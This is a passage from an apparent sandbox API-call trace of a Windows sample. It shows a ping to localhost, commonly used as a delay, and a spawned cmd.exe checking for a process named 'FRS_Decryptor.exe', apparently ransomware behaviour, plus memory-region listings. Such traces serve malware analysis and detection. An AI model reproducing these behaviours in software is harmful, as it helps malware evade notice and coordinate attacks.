_get_osfhandle (_FileHandle=1) returned 0x28 [0098.835] GetFileType (hFile=0x28) returned 0x2 [0098.835] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0098.835] GetLastError () returned 0x6 [0098.835] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✼") returned 0x0 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0098.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.835] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028a78 [0098.835] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x1028a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _write (in: _FileHandle=1, _Buf=0x1028a78*, _MaxCharCount=0x9 | out: _Buf=0x1028a78*) returned 9 [0098.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0098.835] LocalFree (hMem=0x1028a78) returned 0x0 [0098.835] LocalFree (hMem=0x1037fa0) returned 0x0 [0098.835] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xf5f564, nSize=0x0, Arguments=0xf5f560 | out: lpBuffer="羠ăTõ➷\x94䰨盪✧") returned 0x9 [0098.835] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.835] _fileno (_File=0x76ea4c28) returned 1 [0098.835] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.835] GetFileType (hFile=0x28) returned 0x2 [0098.836] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f528 | out: lpMode=0xf5f528) returned 0 [0098.836] GetLastError () returned 0x6 [0098.836] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f48c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0098.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.836] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028a78 [0098.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x1028a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _write (in: _FileHandle=1, _Buf=0x1028a78*, _MaxCharCount=0x9 | out: _Buf=0x1028a78*) returned 9 [0098.836] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0098.836] LocalFree (hMem=0x1028a78) returned 0x0 [0098.836] LocalFree (hMem=0x1037fa0) returned 0x0 [0098.836] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xf5f560, nSize=0x0, Arguments=0xf5f55c | out: lpBuffer="羠ăTõ⟘\x94䰨盪✨") returned 0x9 [0098.836] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.836] GetFileType (hFile=0x28) returned 0x2 [0098.836] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f524 | out: lpMode=0xf5f524) returned 0 [0098.836] GetLastError () returned 0x6 [0098.836] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f488, nSize=0x50 | out: lpBuffer="õ✨") returned 0x0 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0098.836] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x1028a90 [0098.836] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x1028a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _write (in: _FileHandle=1, _Buf=0x1028a90*, _MaxCharCount=0x9 | out: _Buf=0x1028a90*) returned 9 [0098.836] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.836] _fileno (_File=0x76ea4c28) returned 1 [0098.836] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.836] LocalFree (hMem=0x1028a90) returned 0x0 [0098.836] LocalFree (hMem=0x1037fa0) returned 0x0 [0098.836] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xf5f4e8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0098.836] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xf5f4bc, nSize=0x0, Arguments=0xf5f4b8 | out: lpBuffer="羠ăõ᧰\x94䰨盪❏") returned 0x5c [0098.837] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.837] GetFileType (hFile=0x28) returned 0x2 [0098.837] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f480 | out: lpMode=0xf5f480) returned 0 [0098.837] GetLastError () returned 0x6 [0098.837] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f3e4, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.837] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0098.837] LocalAlloc (uFlags=0x40, uBytes=0x5d) returned 0x1038068 [0098.837] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x1038068, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 93 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _write (in: _FileHandle=1, _Buf=0x1038068*, _MaxCharCount=0x5c | out: _Buf=0x1038068*) returned 92 [0098.837] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.837] LocalFree (hMem=0x1038068) returned 0x0 [0098.837] LocalFree (hMem=0x1037fa0) returned 0x0 [0098.837] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xf5f4c8, nSize=0x0, Arguments=0xf5f4c4 | out: lpBuffer="羠ăõᨧ\x94䰨盪❓") returned 0x61 [0098.837] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _get_osfhandle (_FileHandle=1) returned 0x28 [0098.837] GetFileType (hFile=0x28) returned 0x2 [0098.837] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xf5f48c | out: lpMode=0xf5f48c) returned 0 [0098.837] GetLastError () returned 0x6 [0098.837] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xf5f3f0, nSize=0x50 | out: lpBuffer="õ❓") returned 0x0 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0098.837] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0098.837] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0x1038070 [0098.837] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x1038070, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _write (in: _FileHandle=1, _Buf=0x1038070*, _MaxCharCount=0x61 | out: _Buf=0x1038070*) returned 97 [0098.837] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0098.837] _fileno (_File=0x76ea4c28) returned 1 [0098.837] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0098.837] LocalFree (hMem=0x1038070) returned 0x0 [0098.837] LocalFree (hMem=0x1037fa0) returned 0x0 [0098.837] IcmpCloseHandle (IcmpHandle=0x1026bf0) returned 1 [0098.838] LocalFree (hMem=0x102c2f0) returned 0x0 [0098.838] LocalFree (hMem=0x1035270) returned 0x0 [0098.838] WSACleanup () returned 0 [0098.838] exit (_Code=0) Thread: id = 260 os_tid = 0x9dc Thread: id = 261 os_tid = 0x408 Process: id = "90" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x60f2b000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4680 start_va = 0x440000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4681 start_va = 0x460000 end_va = 0x461fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 4682 start_va = 0x470000 end_va = 0x47efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4683 start_va = 0x480000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 4684 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4685 start_va = 0x5c0000 end_va = 0x5c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 4686 start_va = 0x5d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 4687 start_va = 0x5e0000 end_va = 0x5e1fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4688 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4689 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4690 start_va = 0x7f9b0000 end_va = 0x7f9d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f9b0000" filename = "" Region: id = 4691 start_va = 0x7f9d9000 end_va = 0x7f9d9fff entry_point = 0x0 region_type = private name = "private_0x000000007f9d9000" filename = "" Region: id = 4692 start_va = 0x7f9dc000 end_va = 0x7f9dcfff entry_point = 0x0 region_type = private name = "private_0x000000007f9dc000" filename = "" Region: id = 4693 start_va = 0x7f9dd000 end_va = 0x7f9dffff entry_point = 0x0 region_type = private name = "private_0x000000007f9dd000" filename = "" Region: id = 4694 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4695 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4696 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4697 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4698 start_va = 0x6c0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 4699 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4700 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4701 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4702 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 4703 start_va = 0x5f0000 end_va = 0x66dfff entry_point = 0x5f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4704 start_va = 0x700000 end_va = 0x7fffff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4705 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 4706 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4707 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4708 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4709 start_va = 0x7f8b0000 end_va = 0x7f9affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f8b0000" filename = "" Region: id = 4710 start_va = 0x450000 end_va = 0x453fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 4711 start_va = 0x890000 end_va = 0xb64fff entry_point = 0x890000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4730 start_va = 0x460000 end_va = 0x463fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Thread: id = 262 os_tid = 0xa88 [0098.864] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0098.871] __set_app_type (_Type=0x1) [0098.871] __p__fmode () returned 0x76ea1768 [0098.871] __p__commode () returned 0x76ea176c [0098.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0098.871] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0098.871] GetCurrentThreadId () returned 0xa88 [0098.871] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa88) returned 0x34 [0098.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0098.871] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0098.871] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.873] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.873] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x5bf7e4 | out: phkResult=0x5bf7e4*=0x0) returned 0x2 [0098.873] VirtualQuery (in: lpAddress=0x5bf7f3, lpBuffer=0x5bf78c, dwLength=0x1c | out: lpBuffer=0x5bf78c*(BaseAddress=0x5bf000, AllocationBase=0x4c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.873] VirtualQuery (in: lpAddress=0x4c0000, lpBuffer=0x5bf78c, dwLength=0x1c | out: lpBuffer=0x5bf78c*(BaseAddress=0x4c0000, AllocationBase=0x4c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0098.873] VirtualQuery (in: lpAddress=0x4c1000, lpBuffer=0x5bf78c, dwLength=0x1c | out: lpBuffer=0x5bf78c*(BaseAddress=0x4c1000, AllocationBase=0x4c0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0098.873] VirtualQuery (in: lpAddress=0x4c3000, lpBuffer=0x5bf78c, dwLength=0x1c | out: lpBuffer=0x5bf78c*(BaseAddress=0x4c3000, AllocationBase=0x4c0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0098.873] VirtualQuery (in: lpAddress=0x5c0000, lpBuffer=0x5bf78c, dwLength=0x1c | out: lpBuffer=0x5bf78c*(BaseAddress=0x5c0000, AllocationBase=0x5c0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0098.873] GetConsoleOutputCP () returned 0x1b5 [0098.873] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0098.873] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0098.874] _get_osfhandle (_FileHandle=1) returned 0x24c [0098.874] SetConsoleMode (hConsoleHandle=0x24c, dwMode=0x0) returned 0 [0098.874] _get_osfhandle (_FileHandle=1) returned 0x24c [0098.874] GetConsoleMode (in: hConsoleHandle=0x24c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0098.874] _get_osfhandle (_FileHandle=0) returned 0x24 [0098.874] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0098.874] GetEnvironmentStringsW () returned 0x7040c0* [0098.874] FreeEnvironmentStringsA (penv="=") returned 1 [0098.874] GetEnvironmentStringsW () returned 0x7040c0* [0098.874] FreeEnvironmentStringsA (penv="=") returned 1 [0098.874] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5be734 | out: phkResult=0x5be734*=0x44) returned 0x0 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x0, lpData=0x5be740*=0x0, lpcbData=0x5be738*=0x1000) returned 0x2 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x1, lpcbData=0x5be738*=0x4) returned 0x0 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x0, lpData=0x5be740*=0x1, lpcbData=0x5be738*=0x1000) returned 0x2 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x0, lpcbData=0x5be738*=0x4) returned 0x0 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x40, lpcbData=0x5be738*=0x4) returned 0x0 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x40, lpcbData=0x5be738*=0x4) returned 0x0 [0098.874] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x0, lpData=0x5be740*=0x40, lpcbData=0x5be738*=0x1000) returned 0x2 [0098.874] RegCloseKey (hKey=0x44) returned 0x0 [0098.874] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5be734 | out: phkResult=0x5be734*=0x44) returned 0x0 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x0, lpData=0x5be740*=0x40, lpcbData=0x5be738*=0x1000) returned 0x2 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x1, lpcbData=0x5be738*=0x4) returned 0x0 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x0, lpData=0x5be740*=0x1, lpcbData=0x5be738*=0x1000) returned 0x2 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x0, lpcbData=0x5be738*=0x4) returned 0x0 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x9, lpcbData=0x5be738*=0x4) returned 0x0 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x4, lpData=0x5be740*=0x9, lpcbData=0x5be738*=0x4) returned 0x0 [0098.875] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5be73c, lpData=0x5be740, lpcbData=0x5be738*=0x1000 | out: lpType=0x5be73c*=0x0, lpData=0x5be740*=0x9, lpcbData=0x5be738*=0x1000) returned 0x2 [0098.875] RegCloseKey (hKey=0x44) returned 0x0 [0098.875] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5008e [0098.875] srand (_Seed=0x5aa5008e) [0098.875] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0098.875] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0098.875] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0098.875] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7040c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0098.875] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0098.875] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.875] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0098.875] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.875] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0098.875] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0098.875] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0098.875] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0098.875] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0098.875] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0098.875] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0098.875] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0098.875] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0098.875] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x5bf514 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0098.875] GetFullPathNameW (in: 